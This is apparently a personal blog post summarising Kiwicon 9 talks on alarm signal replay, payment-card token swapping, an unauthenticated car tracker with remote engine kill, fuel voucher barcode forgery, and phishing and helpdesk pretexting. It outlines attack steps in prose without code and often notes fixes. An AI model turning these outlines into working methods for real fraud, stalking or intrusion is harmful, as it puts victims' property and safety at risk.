Kiwicon 9 Day 2 Afternoon

So my notes got a bit sparse here, partly because of a really nice lunch with maaaaaybe one too many espressotinis, but also because apparently taking notes upset someone behind me with a laser pointer. Which, you know, too bad, but it didn’t help.

Also, I’m publishing these less than a week before Kiwicon X, which says a lot about how bad I was at editing the second day’s material.

Talk: Alarming your Neighbours

bitrat & Britta

This talk covered the ways in which security systems suck. The talk stayed in-character to the theme of the conference, which was nice.

The team had focused on the type of wireless alarm installations that have become very common in rural areas in NZ; some of the models they look at are heavily advertised on the radio, aimed at farmers concerned about equipment loss. One they called out by name was the Spectra 4000 - the more expensive of these is the most vulnerable of the options.

They noted some of the basics of alarm systems; for example, the main detectors include reeds - detect opening and closing of doors, as opposed to PIRs - infrared detectors used in (for example) motion sensors.

The DSC modules broadcast consistent patterns over radio channels, which the team were able to reverse engineer the signal of with a little help from FCC documents for the basic crack, although they noted each alarm has subtle differences in the frequency and data formats. Capture, analysis, and playback is done with the assistance of GNU radio, and they have created the GNU radio flow graphs to help with this.

The result of all this work is pretty cool; with the right replay you can:

  • Lock and unlock the alarm.
  • Prevent the alarm locking.
  • Fake open or close signals from device.

Essentially rendering the alarm system useless, or sending anyone monitoring it on wild goose chases around their properly.

Capture signals, identify known ones, discard the rest. Signal consistency is important.

Naturally there is a github repo.

Talk: Forging a New Identity AKA Begrudingly Embracing SEO

megahbite

First, this was a gutsy talk and parts obviously weren’t comfortable or easy for Megan.

Second the talk itself concerned identity, and changing it. Megan noted that there are many reasons to want to change and mask our identities - youthful errors, abuse, political activists, and so on.

The problem is that the Internet never forgets; unlike those of us old enough to have committed our worst online idiocy in the days now lost to the memory holes of DejaNews and AltaVista, it is not a trivial problem.

Megan had personal reasons for this talk: came out as transgender 4 years ago. The old identity of transfolk is often used to attack them.

Obfuscation

Being anonymous is increasignly difficult. Even using Tor won’t protect you if you make small mistakes, as Dread Pirate Roberts discovered.

Facebook is now ubiquitous. Not having social media isolates you - and is considered suspicious in and of itself; employers and border guards consider the lack of a Facebook account the sign of a suspicious person. And even if you do avoid them, Facebook and Twitter run shadow profiles.

Happily there is little verification of this data.

  • Work out your unique identifiers.
  • Leave comments on blogs to create multiple new handles.
  • Associate a real names with different handles. This creates a confusing mesh and plausible deniability.
  • Don’t create a wildly different profile. It’s too hard. A lie is most believable when wrapped in some truth.

Creating a new Identity

  • Legally change your name. Easy in NZ, hard in other countries.
  • Prior names will still be on the public record.
  • This where it gets hard, unfortunately.
  • Utility companies are awful. PayPal are hostile to name changes, so was Telecom (now Spark).
  • Support the new identity with the reverse of the obfuscation techniques above.

Elimination

  • the body…remove the fingerprints…

Summary

  • Nothing is as good as good OpSec…
  • …which is much easier said than done.
  • You need to rely on the discretion of your friends and family, too. It’s a team sport

Talk: “Coin” up the Khyber

Peter Fillmore

Reversing a Bluetooth payments device. The “Coin” product copies your magstrips and replays them in EFTPOS machines. This is sold as a convenience to users.

“The thing that came after punchcards.” Magstrips were broken in 1992.

Sammy Kamkar broke it with a contactless replay device.

Whats in a Coin

Coils, bluetooth, battery, eink.

Respect for the hardware engineers (this looks like it was the well-designed bit), not so much the programmers.

Breaking the Coin

Uses Bluetooth LE. Sniffed with an Ubertooth. Too hard, ask Mike Ryan.

  • Use a root mode Bluetooth logger on you phone.
  • Inspect in Wireshark.
  • Decompile the app to get the Bluetooth UUIDs the app uses to communicate with the card.
  • Turns out the app is easy to MiTM. and editing the app DB lets you load the card with a fake verification.
  • Stripe do the verification. If you validate a good card, then load the token against the expired card.
  • Now you can use the bad card’s token to process against the good card.
  • Took half a day.

How to fix

Validate the track data server side Don’t embed the ID in the app Verify the identity of the card submitter.

Talk: Hilarious bullshit in Golang

richö butts

richö kicked off by noting a number of things; one was that “my whole talk is performance art”; another was that he’d worked quite a lot with go, was rather familiar with it, and wasn’t interested in listening to a lot of post-talk whining from people upset he’d noticed the warts.

  • Go: Fuck Yourself.
  • Use Go instead of JavaScript for your Hipster startup.

cgo

  • Theres lots of code that exposes a C calling convention.
  • This is a good idea.
  • Go is type and memory safe, so you need tools to go type inference.
  • There are tools to this. Of variable quality.
  • Like shelling to gcc, causing an error, and parsing the output.
  • The comments are hilarious.
  • Terrible assumptions abound.
  • Includes for C are in comments. Which are magic. You’d think comments are comments, but… NOOOOOOPE.

Story Time

  • Tried adding generics.
  • Used the parser.
  • Which aren’t that terrible.
  • Wait there are three: one for parsing package imports.
  • Go has a go-specific yacc. Which isn’t like any other yacc.
  • A parser to build the other parser.

Reinvent all the wheels

  • Lots of go breakage is justified as “works on Plan 9”.
  • This is silly.

Essentially richö is of the opinion that large chunks of go are an effort to foist a failed OS on the rest of the world in the guise of a programming language.

Dependency Management

  • Thanks to unchecked remote builds, builds can’t be reproduced.
  • It can become literally impossible to ever build your code again if upstream changes.

Talk: A Bitter Story of Aftermarket Vehicle Tracking & Control

Lachlan (skooch) Temple

This talk was incredibly terrifying, and an object lesson that no matter how bad you think the IoT is, it can always get worse. It concerns a car tracker, made by a company called Thinkrace (who also sell child trackers!), which purports to act as an anti-theft device. As we learned, it’s also a very effective stalking device, mayhem-in-traffic-device, and maybe even killing-people-on-the-other-side-of-the-world.

  • Tracks your car or fleet.
  • A response GPS; uses a SIM to recieve commands and can the GPS to monitor the location, speed, etc.
  • Can be wired up to cut the ignition to kill the car on a remote command.
  • Comes with a web app!
  • The login is the same as tge serial number. Passwords are the clear!
  • The app has GPS, geologging, geofencing - you can monitor someone’s activity, alert when they leave an area, and so on.
  • Google revoked their Msps API key.
  • No auth required for their cloud application. Enter an ID, fill your boots.
  • You can even send vehicle kill commands.
  • This is really bad - if you want to stalk someone, this makes it easy. If you want to cut the engine while they’re on the motorway, you can. It’s too easy.
  • The mobile app is just as terrible.

Talk: Metadata retention law and internet dating in Australia vs New Zealand

nanomebia

Metadata

  • Data about data.
  • There is official definitions in the legislation. 2635 lines.
  • The Australian government wanted dumps for law enforcement.
  • “The online civil libertarians vs everyone else”? Fucking really?
  • Turns out Five Eyes were doing it anyway.
  • Of course, Google et al have been hoovering this up anywy.

Crossover

au and nz are sharing anything they can get away with.

“Calm down. Don’t focus on the negatives.”

Kinda didn’t see much value in being condescended to.

There is a Bigger Problem

How do we protect our privacy and find a middle ground?

The “bigger problem” for me with this talk was that the speaker seemed to think that they were talking to a room of dim children. Or trolling. Hard to tell.

Talk: Cyberfuel

Jeremy and Ryan

This is a talk on the wonders and weaknesses of the Z fuel discount voucher system.

  • Numbers were the first effort. Until people started sharing them. Because they could be reused.
  • Even Z were sharing them officially.
  • Their denials of the seriousness of the hack sounded like what you’d say if you didn’t want to change.
  • Turns out the barcodes are don’t change when they’re printed. They’re all the same!
  • The barcode increments on date. And they’re unencrypted. Date since the death of Duke Albert I.
  • Discount amount is in plaintext. Number - 50c.

Why?

  • Barcode was convenient for cashiers.
  • Now you can pay-at-pump, the vouchers are exploitable at the pump.

Now What?

So you’ve cracked a thing, and a thing that has Real Money associated with it. What do you do? NZITF guidelines are really helpfull.

“Don’t tell anyone. This is really hard when you’ve found a thing.”

Z would rather not inconvenience legit customers to lock out crooks. This, I have to say, doesn’t seem unreasonable if the cost of not annoying your legitimate customers vs the cost of fraud adds up.

Walking around the pumps with a portable barcode backup system. “This is not suspicious.”

There’s a smartwatch app for that… select a discount amount… generates a backup for you. Or you could, like them, tape out a barcode on your t-shirt and get discounts with it, just the same.

These guys are actually funny. Neat talk, good speakers.

Event: People’s Choice Cyber Talk

Thomas Lim

Blackhat moved into town and were huge arseholes, demanding SyScan move dates (from its long established slot) so Blackhat could have them.

“So I got money from the Chinese to fuck Blackhat Asia.”

The Nihilist’s Guide to Wrecking Humans and Systems

Christina Camilleri (@0xkitty) and Shubs Shah (@infosec_au)

  • Humans have wants and needs and drivers and make judgements.
  • Computers do instructions good.

When we put them together we can produce results which are unexpected when we analyse them in isolation.

we can, for example, play on peiple’s feeling to have them work around the securty of the system. As Christina and Shubs demonstrate, this makes breaking things much, much easier than it would otherwise be.

The Problem

We look at these independently. So we (inadvertently) give the human the ability to break the system.

An Example

  • A phish that asks people to update their healthcare benefits. The email was crafted to a spoofed account.
  • People became confused. “What,” they asked, “is wrong.”
  • HR ran up a warning flag in a mass-mailout.
  • And then a couple of days later, so did the infosec team. In a mass-mailout.
  • So Christina masqueraded as Gwen, part of the infosec clean up (since Gwen had helpfully identified herself in the mailout).
  • “You need to download this security patch.”
  • The employee had access to WebsphereMQ Explorer and bunch of queues. And execute commands on the queue managers.
  • So the server has access to the source repos via Maven.
  • Which gets to nmap and Jenkins.
  • Jenkins is good news. For hackers.
  • Unauthed Jenkins with access to production is even better news.

Essentially, Christina was able to design a people-engineering strategy that let Shubs start already inside the hardened perimter, in the soft, gooey centre of the network. Trying to bludgeon in from the outside is harder than being invited in.

So What Goes Wrong

  • People kept trying the phish.
  • We assume trustworthiness.
  • We assume people will not do anything wrong.
  • We over-focus on the perimeter.
  • So we need to focus on the inside of the box, not the outside of the box.
  • Assume your network is compromised.

Another Story

  • Pretend Christina.
  • Pretend Christina was travelling and needed a password reset.
  • She’s terrible at computers. Tee hee.
  • Happily Adam from the helpdesk was really helpful.
  • Since Pretend Christina didn’t have email or a 2FA token, she was hard to help.
  • But Adam got her a temporary token!
  • Adam is so helpful.

  • Pivot to DNS enumeration of interesting servers.

  • Servers full of default Domain/admin or tomcat/tomcat logins.

  • The target was copying user data from prod unobfuscated every week.

  • Storing twitter credentials for bigcorp in the clear.

What Went Wrong

  • Adam shouldnt be able to bypass technical controls.
  • The internal network security was terribad.

phish.js

PreyProject

  • XSS on help.preyproject.com
  • Starting with a low grade technical attack and escalate with phishing.
  • Use the help page via a cors proxy to get the login page with a doctored base tag to get credentials
  • Overlays a login over the help page.
  • Easier than beef if you can find XSS ony subdomain.

What Are We Doing Wrong

  • Make sure people’s roles marry up with their ability to do stuff.
  • Low level people shouldn’t have high level access.
  • Least priv.
  • Sandbox the browser and mail client.

This was a great talk; for one thing, it shows the degree to which we’re still underestimating the human element of security concerns and, for another, the degree to which we think in terms of a “safe zone” inside a hardened perimter. It’s really easy to get people to make mistakes, especially if you can tap into their sense of trying to do the right thing (helping an end user, seeing off a phishing attack in the examples here); if you compound that with a security model that assumes people are perfect and the zone inside your perimeter is rock solid, you’re really, really screwed.

Share